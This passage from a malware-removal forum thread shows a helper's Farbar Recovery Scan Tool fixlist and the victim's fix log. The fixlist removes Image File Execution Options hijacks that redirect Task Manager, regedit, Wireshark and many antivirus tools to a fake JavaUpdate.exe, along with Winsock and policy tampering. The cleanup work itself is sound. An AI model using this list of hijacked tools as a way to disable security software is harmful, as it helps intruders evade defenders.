IFEO\opfsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\OPSSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\op_mon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\outpost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Packetizer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Packetyzer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pcipprev.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pctav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pctavsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pcviper.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\persfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pfft.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pgaccount.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\prevxcsi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\prifw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\privatefirewall: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\privatefirewall3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ProcessHacker.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procexp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procguard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\protect.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSANHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSUAMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSUAService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtSessionAgent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtSvcHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtWatchDog.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pxagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\QUHLPSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\rawshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\RDTask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\regedit.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\rtt_crc_service.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sab_wab.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sagui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SAPISSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SASCore64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SASTask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savadminservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savcleanup.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savcli.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savmain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savprogress.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBAMSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBAMTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBPIMSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SCANNER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SCANWSCS.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scfmanager.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scfservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\schedulerdaemon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scproxysrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ScSecSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevcon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevconIA.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevconx.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDFSSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdtrayapp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDWelcome.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\siteadv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sndsrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Sniffer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\snsmcon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\snsupd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SoftAct.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spfirewallsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sppfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spybotsd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SpyHunter3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spywareterminatorshield.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spywat~1.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sp_rsser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ssupdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SSUpdate64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SUPERAntiSpyware.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SUPERDelete.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Taskmgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Tcpdump.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\terminet.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Tethereal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\text2pcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\THGuard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tppfdmn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\TRAYICOS.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\TRAYSSER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\trigger.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tscutynt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tzpfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiSeAgnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiUpdateTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiWatchDog.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiWinMgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\umxagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\umxtray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UnThreat.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\updclient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UserAccountControlSettings.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\utsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UUpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uwcdsvr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Main.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Medic.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Proxy.ahn: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3SP.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Svc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Up.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VCATCH.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\vdtask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VIEWTCP.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VIPREUI.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\virusutilities.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VSDesktop.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\WebCompanion.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\webwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Windump.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\winroute.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\wireshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\wwasher.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\xauth_service.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\xfilter.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Zanda.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zerospywarele.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zerospywarelite_installer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Zlh.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zlhh.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe

GroupPolicy: Restriction <======= ATTENTION

Winsock: Catalog5 03 C:\Windows\SysWOW64\mswsock.dll [231424 2016-05-11] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 04 %SystemRoot%\System32\nwprovau.dll No File
Winsock: Catalog5-x64 01 C:\Windows\System32\mswsock.dll [327168 2016-05-11] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
cmd: netsh winsock reset

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> No File
Toolbar: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
FF user.js: detected! => C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\user.js [2016-09-16]
FF Extension: (No Name) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\temp [2009-10-15] [not signed]
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]

U3 alz4j5u7; C:\Windows\System32\Drivers\alz4j5u7.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 cpuz130; \??\C:\Users\Kevin\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X]
S3 NVIDIAHWAccess; \??\C:\Users\Kevin\AppData\Roaming\NVIDIA\HWAccess.sys [X]
S4 nvlddmkm; system32\DRIVERS\nvlddmkm.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 usbbus; system32\DRIVERS\lgx64bus.sys [X]
S3 UsbDiag; system32\DRIVERS\lgx64diag.sys [X]
S3 USBModem; system32\DRIVERS\lgx64modem.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

C:\ProgramData\tP5544K4.dat
C:\Users\Kevin\AppData\Local\Temp\svchost.exe

DeleteJunctionsIndirectory: C:\Windows\system64

AlternateDataStreams: C:\Program Files\Common Files\Microsoft Shared:9JWpxEmW4v11qmJOqJ7pjYs [2200]
AlternateDataStreams: C:\ProgramData\Microsoft:cyqnzX4eKYNTzpFQUfDk [2544]
AlternateDataStreams: C:\ProgramData\Microsoft:okPhkWKR99NHqk9eugRi0qqcLPl [615]
AlternateDataStreams: C:\ProgramData\TEMP:33384BC0 [99]
AlternateDataStreams: C:\ProgramData\TEMP:3A6BC948 [115]
AlternateDataStreams: C:\ProgramData\TEMP:89C2A42C [116]
AlternateDataStreams: C:\ProgramData\TEMP:91486201 [185]
AlternateDataStreams: C:\ProgramData\TEMP:D2A5A561 [112]
AlternateDataStreams: C:\ProgramData\TEMP:DED17083 [250]

HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Classes\exefile: "%1" %* <===== ATTENTION

Zip: C:\Users\Kevin\AppData\Local\05re0r73hpdmdp8g0u15a6u6kmy4;C:\ProgramData\r0t835ni0n1t18aj4n071sa4s7m;C:\TDSSKiller.3.1.0.11_14.10.2016_19.38.41_log.txt;C:\TDSSKiller.3.1.0.11_14.10.2016_19.37.30_log.txt

EmptyTemp:
  • Now name that file fixlist.txt
  • Please run FRST
  • Click the "fix" button.
  • Please copy and paste the fixlist.txt removal log into your reply.
  • A file called Upload.zip will be created on your desktop. Upload it to SendSpace and post the link in your reply

--------------------

 

Please copy and paste, include in your reply

  • FRST fixlog.txt
  • Sendspace download link
  • How is the machine running now? Does it start correctly? Any other immediate concerns?

TsVk!



#5 jumpman17

Posted 21 October 2016 - 07:09 AM

Thanks for working on this for me. This confirms my thought that it was a backdoor virus of some sort. However, I did pull my ethernet cable the second my computer locked up and I've blocked all incoming and outgoing connections in Windows Firewall to the IP address it was trying to connect to when I had it disconnected from the internet. I also changed my bank account password from my phone that day as well as a precaution. I don't want to go through the hassle of wiping the drive and reinstalling Windows, and I think I'll be ok, but I understand what you are saying about no way to be sure.

As for how it's running now, Task Manager and Registry Editor both work again, so that's fixed.

Here is the zip file. I had deleted the TDSS Killer logs the other day, so those aren't in there. I can rerun the program, though, if you want a report from that. https://www.sendspace.com/file/235aly

Here is the removal log:


Fix result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Kevin (21-10-2016 07:44:03) Run:1
Running from C:\Users\Kevin\Desktop
Loaded Profiles: Kevin (Available Profiles: Kevin)
Boot Mode: Normal
==============================================

fixlist content:
*****************
HKLM-x32\...\Run: [] => [X]

IFEO\siteadv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sndsrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Sniffer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\snsmcon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\snsupd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SoftAct.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spfirewallsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sppfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spybotsd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SpyHunter3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spywareterminatorshield.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spywat~1.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sp_rsser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ssupdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SSUpdate64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SUPERAntiSpyware.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SUPERDelete.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Taskmgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Tcpdump.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\terminet.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Tethereal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\text2pcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\THGuard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tppfdmn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\TRAYICOS.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\TRAYSSER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\trigger.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tscutynt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tzpfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiSeAgnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiUpdateTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiWatchDog.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiWinMgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\umxagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\umxtray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UnThreat.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\updclient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UserAccountControlSettings.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\utsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UUpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uwcdsvr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Main.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Medic.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Proxy.ahn: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3SP.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Svc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Up.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VCATCH.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\vdtask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VIEWTCP.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VIPREUI.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\virusutilities.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VSDesktop.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\WebCompanion.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\webwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Windump.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\winroute.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\wireshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\wwasher.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\xauth_service.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\xfilter.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Zanda.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zerospywarele.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zerospywarelite_installer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Zlh.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zlhh.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe

GroupPolicy: Restriction <======= ATTENTION

Winsock: Catalog5 03 C:\Windows\SysWOW64\mswsock.dll [231424 2016-05-11] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 04 %SystemRoot%\System32\nwprovau.dll No File
Winsock: Catalog5-x64 01 C:\Windows\System32\mswsock.dll [327168 2016-05-11] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
cmd: netsh winsock reset

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> No File
Toolbar: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
FF user.js: detected! => C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\user.js [2016-09-16]
FF Extension: (No Name) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\temp [2009-10-15] [not signed]
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]

U3 alz4j5u7; C:\Windows\System32\Drivers\alz4j5u7.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 cpuz130; \??\C:\Users\Kevin\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X]
S3 NVIDIAHWAccess; \??\C:\Users\Kevin\AppData\Roaming\NVIDIA\HWAccess.sys [X]
S4 nvlddmkm; system32\DRIVERS\nvlddmkm.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 usbbus; system32\DRIVERS\lgx64bus.sys [X]
S3 UsbDiag; system32\DRIVERS\lgx64diag.sys [X]
S3 USBModem; system32\DRIVERS\lgx64modem.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

C:\ProgramData\tP5544K4.dat
C:\Users\Kevin\AppData\Local\Temp\svchost.exe

DeleteJunctionsIndirectory: C:\Windows\system64

AlternateDataStreams: C:\Program Files\Common Files\Microsoft Shared:9JWpxEmW4v11qmJOqJ7pjYs [2200]
AlternateDataStreams: C:\ProgramData\Microsoft:cyqnzX4eKYNTzpFQUfDk [2544]
AlternateDataStreams: C:\ProgramData\Microsoft:okPhkWKR99NHqk9eugRi0qqcLPl [615]
